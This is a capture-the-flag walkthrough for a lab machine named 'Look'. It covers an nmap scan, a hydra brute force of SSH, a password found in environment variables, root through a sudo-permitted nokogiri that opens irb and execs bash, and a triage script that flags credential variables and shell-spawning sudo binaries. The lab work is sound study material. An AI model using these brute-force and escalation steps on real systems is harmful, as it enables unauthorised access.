# Lab setup
Download: Look
NAT mode, target IP: 192.168.1.134
# Penetration process
# Initial information gathering
Service scan (nmap output):

```text
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
|   3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)
|   256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)
|_  256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519)
80/tcp open  http    Apache httpd 2.4.56 ((Debian))
|_http-server-header: Apache/2.4.56 (Debian)
|_http-title: Apache2 Debian Default Page: It works
```
Directory scanning turns up an info.php. Reading through it, one detail stands out: a user named axel. With a username in hand, brute-force SSH.
```text
┌──(root㉿kali)-[~]
└─# hydra -l axel -P /usr/share/wordlists/rockyou.txt 192.168.1.134 ssh -t 64 -I
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-05-18 00:19:17
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~224132 tries per task
[DATA] attacking ssh://192.168.1.134:22/
[STATUS] 304.00 tries/min, 304 tries in 00:01h, 14344124 to do in 786:25h, 35 active
[22][ssh] host: 192.168.1.134   login: axel   password: bambam
1 of 1 target successfully completed, 1 valid password found
```
That gives the password: bambam. Hydra's warning about -t is worth heeding: sshd's default MaxStartups (10:30:100) starts refusing new unauthenticated connections once 10 are pending, so with 64 parallel tasks many attempts are refused and retried rather than adding speed; -t 4 is the sensible setting against SSH.
# Privilege escalation
Once logged in as axel, the environment variables contain dylanPASS=bl4bl4Dyl4N, which is a password for a second user, dylan.
With that password, SSH in as dylan and run sudo -l.
dylan is allowed to run nokogiri through sudo.
Reading its help and running it once does not make the route obvious. Searching on the tool name shows that nokogiri drops you into an irb session with the parsed document in @doc, and from irb you can exec a shell; because nokogiri was started via sudo, that shell runs as root.
```text
dylan@look:/var/www/html$ sudo /usr/bin/nokogiri https://blog.gddfeng.com
Your document is stored in @doc...
irb(main):001:0> exec '/bin/bash'
root@look:/var/www/html# whoami
root
```
Done: root.
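The two checks that carried this privilege escalation (credential-looking environment variables, then sudo entries for programs that hand you an interpreter) are easy to script for the next box. The following is an added example, not code from the original writeup. The env and sudo -l text it parses are constructed samples: the actual sudoers entry for dylan is not shown in the writeup, API_TOKEN is invented, and RISKY_BINS is a short illustrative list rather than a complete one.

```bash
#!/usr/bin/env bash
# Added example (not from the original writeup): post-login triage helpers.
# Both functions read text on stdin, so they run offline against the
# constructed samples below; on a real host pipe in `env` and `sudo -l`.

# Constructed sample of `env` output, modelled on the dylanPASS finding
# (API_TOKEN is invented for the example).
SAMPLE_ENV='SHELL=/bin/bash
USER=axel
dylanPASS=bl4bl4Dyl4N
PATH=/usr/local/bin:/usr/bin:/bin
API_TOKEN=abc123
LANG=en_US.UTF-8'

# Constructed sample of `sudo -l` output. The real sudoers entry on Look
# is not shown in the writeup; this shape is an assumption.
SAMPLE_SUDO='Matching Defaults entries for dylan on look:
    env_reset, mail_badpass

User dylan may run the following commands on look:
    (ALL) NOPASSWD: /usr/bin/nokogiri'

# Binaries that give the caller an interpreter or shell when run via sudo.
# Short illustrative list; extend it from GTFOBins-style references.
RISKY_BINS='nokogiri irb ruby python python3 perl vim vi nano less more man find awk gdb'

# Print KEY=value lines whose variable name contains a credential-like token.
find_secret_vars() {
  grep -Ei '^[A-Za-z0-9_]*(pass|pwd|secret|token|key|cred)[A-Za-z0-9_]*='
}

# Print each sudo-permitted command whose basename is in RISKY_BINS.
flag_risky_sudo() {
  # Permission lines start with "(runas)"; strip the runas spec and the
  # NOPASSWD tag, then split comma-separated command lists one per line.
  grep -E '^[[:space:]]*\(' |
    sed -E 's/^[[:space:]]*\([^)]*\)[[:space:]]*(NOPASSWD:[[:space:]]*)?//' |
    tr ',' '\n' |
    while read -r cmd; do
      [ -n "$cmd" ] || continue
      base=$(basename "${cmd%% *}")
      for b in $RISKY_BINS; do
        if [ "$base" = "$b" ]; then
          echo "RISKY: $cmd ($base can spawn a shell)"
        fi
      done
    done
}

# Stand-alone run against the constructed samples.
printf '%s\n' "$SAMPLE_ENV" | find_secret_vars
printf '%s\n' "$SAMPLE_SUDO" | flag_risky_sudo
```

On the Look box, the first function would surface dylanPASS and the second would flag /usr/bin/nokogiri, which is exactly the chain used above; the name match is deliberately on the basename only, so a sudo rule for a copy of the binary under another path is still caught.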
# Summary
If a program can be run through sudo, try running it even when you do not know what it is, then pull out the useful details (here, that it opens an irb session) and search on them.